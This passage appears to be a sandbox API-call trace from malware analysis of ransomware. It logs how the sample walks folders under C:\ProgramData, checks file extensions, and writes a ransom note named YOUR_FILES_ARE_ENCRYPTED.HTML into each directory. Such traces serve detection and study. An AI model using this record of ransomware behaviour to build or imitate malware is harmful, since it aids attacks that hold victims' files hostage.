pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup") returned 43 [0157.520] GetProcessHeap () returned 0x270000 [0157.520] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0157.520] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup") returned="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup" [0157.520] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup\\*" [0157.520] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0157.520] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.520] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, 
ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.520] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0157.520] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0157.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\setup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft onedrive\\setup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0157.521] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0157.523] CloseHandle (hObject=0x58c) returned 1 [0157.524] GetProcessHeap () returned 0x270000 [0157.525] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0157.525] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="setup", cAlternateFileName="")) returned 0 [0157.525] FindClose (in: hFindFile=0x42f3100 | out: 
hFindFile=0x42f3100) returned 1 [0157.525] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 67 [0157.525] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft onedrive\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0157.526] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0157.528] CloseHandle (hObject=0x4a4) returned 1 [0157.528] GetProcessHeap () returned 0x270000 [0157.530] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0157.530] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x3cecc530, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x3cecc530, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1 [0157.530] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache") returned 32 [0157.530] GetProcessHeap () returned 0x270000 [0157.530] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0157.530] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\ProgramData\\Package Cache" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache") 
returned="\\\\?\\C:\\ProgramData\\Package Cache" [0157.530] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*" [0157.530] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x3cecc530, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x3cecc530, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0157.530] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x3cecc530, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x3cecc530, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.530] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cb75910, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cbe7d30, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cbe7d30, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="564F02E6419B9858949B0CD5A65E2C8C0944DD88", cAlternateFileName="564F02~1")) returned 1 [0157.530] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 
Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88") returned 73 [0157.530] GetProcessHeap () returned 0x270000 [0157.530] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0157.530] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88") returned="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88" [0157.530] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\*" [0157.531] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cb75910, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cbe7d30, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cbe7d30, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0157.531] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cb75910, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cbe7d30, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cbe7d30, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.531] FindNextFileW (in: 
hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cbe7d30, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cbe7d30, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0157.531] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages") returned 82 [0157.531] GetProcessHeap () returned 0x270000 [0157.531] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.531] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages" [0157.531] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\*" [0157.531] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cbe7d30, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cbe7d30, 
ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.532] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cbe7d30, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cbe7d30, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.532] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cebb750, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cebb750, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Patch", cAlternateFileName="")) returned 1 [0157.532] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch") returned 88 [0157.532] GetProcessHeap () returned 0x270000 [0157.532] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.534] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch") returned="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch" [0157.534] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package 
Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\*" [0157.534] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cebb750, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cebb750, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.535] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cebb750, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cebb750, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.535] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cebb750, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cebb750, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cebb750, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="x86", cAlternateFileName="")) returned 1 [0157.535] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, 
pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86") returned 92 [0157.535] GetProcessHeap () returned 0x270000 [0157.535] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0157.536] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86" [0157.536] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\*" [0157.536] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cebb750, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cebb750, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cebb750, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0157.537] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cebb750, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cebb750, ftLastAccessTime.dwHighDateTime=0x1d706a7, 
ftLastWriteTime.dwLowDateTime=0x1cebb750, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.537] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x972dc300, ftCreationTime.dwHighDateTime=0x1d287fd, ftLastAccessTime.dwLowDateTime=0x972dc300, ftLastAccessTime.dwHighDateTime=0x1d287fd, ftLastWriteTime.dwLowDateTime=0x972dc300, ftLastWriteTime.dwHighDateTime=0x1d287fd, nFileSizeHigh=0x0, nFileSizeLow=0x9990e, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows6.1-KB2999226-x86.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0157.537] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\Windows6.1-KB2999226-x86.msu") returned 121 [0157.537] lstrcmpW (lpString1="Windows6.1-KB2999226-x86.msu", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.538] PathFindExtensionW (pszPath="Windows6.1-KB2999226-x86.msu") returned=".msu" [0157.538] lstrlenW (lpString=".msu") returned 4 [0157.538] PathFindExtensionW (pszPath="Windows6.1-KB2999226-x86.msu") returned=".msu" [0157.538] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x972dc300, ftCreationTime.dwHighDateTime=0x1d287fd, ftLastAccessTime.dwLowDateTime=0x972dc300, ftLastAccessTime.dwHighDateTime=0x1d287fd, ftLastWriteTime.dwLowDateTime=0x972dc300, ftLastWriteTime.dwHighDateTime=0x1d287fd, nFileSizeHigh=0x0, nFileSizeLow=0x9990e, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows6.1-KB2999226-x86.msu", cAlternateFileName="WINDOW~1.MSU")) returned 0 [0157.538] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0157.538] wnsprintfW (in: 
pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0157.538] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\packages\\patch\\x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0157.538] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0157.541] CloseHandle (hObject=0x4a8) returned 1 [0157.541] GetProcessHeap () returned 0x270000 [0157.543] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0157.543] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cebb750, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cebb750, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cebb750, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="x86", cAlternateFileName="")) returned 0 [0157.543] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.543] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 118 [0157.543] CreateFileW 
(lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\packages\\patch\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.544] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.546] CloseHandle (hObject=0x5a0) returned 1 [0157.547] GetProcessHeap () returned 0x270000 [0157.548] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.548] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cebb750, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cebb750, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Patch", cAlternateFileName="")) returned 0 [0157.548] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.548] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0157.548] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\packages\\your_files_are_encrypted.html"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0157.549] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.551] CloseHandle (hObject=0x598) returned 1 [0157.552] GetProcessHeap () returned 0x270000 [0157.553] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.553] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, 